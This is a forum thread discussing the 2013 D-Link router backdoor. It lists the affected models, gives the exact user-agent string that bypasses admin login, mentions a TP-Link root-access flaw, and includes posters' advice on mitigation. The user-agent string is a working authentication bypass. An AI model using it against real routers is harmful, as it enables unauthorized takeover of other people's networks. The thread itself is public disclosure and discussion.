Backdoor found in D-Link router

[LAwLz]

A developer at /DEV/TTYS0 downloaded firmware 1.13 for his DIR-100 revA and decided to reverse engineer it a bit. What he found appears to be a backdoor.

If you change your browser's useragent to "xmlset_roodkcableoj28840ybtide" without the quotes, you can access the web GUI of the router without having to type in a password or username. Basically, if you use a D-Link router's firmware which has this function, anyone can access your network and basically do anything to you (change password on the network and kick you out, redirect you to scam sites, monitor your traffic etc). If you read the user agent backwards it says "JoelBackDoor" so it's obvious that this was put in the firmware on purpose.

It seems like these models are affected:

• DIR-100
• DI-524
• DI-524UP
• DI-604S
• DI-604UP
• DI-604+
• TM-G5240
• BRL-04UR
• BRL-04CW

But there is no telling if other routers has this as well. It's worth noting that this is an old firmware, but what makes me wonder is, why would they add this and if they used to add it in their old firmwares, are they adding it in their new ones as well?

So, what purpose do you people think this backdoor has and do you think other manufacturers and/or newer versions of the firmware also has backdoors like this? This is what worried me as soon as I started hearing about the NSA implementing backdoors into closed source software. If the backdoors are exposed, then even your average Joe could potentially wreak havoc on other peoples' equipment.

 

Source: /DEV/TTYS0

 

 

 

Some TP-Link routers also has a bug (not sure if this one is actually intended to be a backdoor like the D-Link one) which lets you remotely access the router with root privileges by sending a simple HTTP request which then starts a TFTP transfer from the host computer to the router, and then executes the file as root.

More info about that here: Sekurak

[colonel_mortis]

The fact that it's called joelbackdoor makes it look like someone at D-Link decided to try and add a backdoor for their own purposes, without the company knowing. Says something for the people who check the code though if it was only found by someone who tried to reverse engineer their (compiled presumably) code and not their QA team.

[qwertywarrior]

there is an app available that lists all routers with such vulnerabilities  that make it easy to access most routers

 

if a person is this scared he can just install  tomato or dd-wrt

[Ethnod]

Christ I hope that this was not built into the routers on purpose. tbh I owned one years ago, never been a huge fan of D-Link, they gave me nothing but issues (mine and ones owned by friends of mine). Always been a netgear person myself but starting to think that a homemade open firmware one is best tbh

 

 

A group of embedded device hackers has turned up a vulnerability in D-Link consumer-level devices that provides unauthenticated access to the units' admin interfaces.

 

The flaw means an attacker could take over all of the user-controllable functions of the popular home routers, which includes the DIR-100, DI-524, DI-524UP, DI-604S, DI-604UP, DI-604+ and TM-G5240 units. According to the post on /DEV/TTYS0, a couple of Planex routers are also affected, since they use the same firmware.

 

Source:

http://www.theregister.co.uk/2013/10/13/dlink_routers_have_admin_backdoor/

[Samdb]

How did they not patch this up? This is unacceptable.

[sysloc]

So this backdoor is way more security breachy than the regular old username: admin - password: password

[CleanerTax]

Already posted.

[Ethnod]

Already posted.

 

Yip, LAwLz beet me to it the fecker

 

https://linustechtips.com/main/topic/65239-backdoor-found-in-d-link-router/

[tom564]

How did they not patch this up? This is unacceptable.

A lot of routers are vulnerable to similar attacks, 2 wire had a big problem with them a while back and the local exploitation still exists. I have seen business grade routers vulnerable to simpler attacks that allow full admin access from a locally connected client. The best thing to do is to disable remote access and only manage from internally. 

 

although even disabling the remote management feature is not always enough https://forums.hak5.org/index.php?/topic/29775-cisco-linksys-ea-series-vulnerability/

[tom564]

A lot of routers have weak security, and a lot of them are on-line with default passwords and remote management features enabled by default. 

 

http://www.routerpwn.com/

[Glenwing]

Threads merged

[mgsstar]

I usually install third party software like DD-WRT on routers because the stock firmware is sometimes not very good imo.

[neon]

About the TP-Link issue on the website it says "it is WAN exploitable if http admin is available from WAN side" does this mean if you have Remote Admin turned off it is not vulnerable?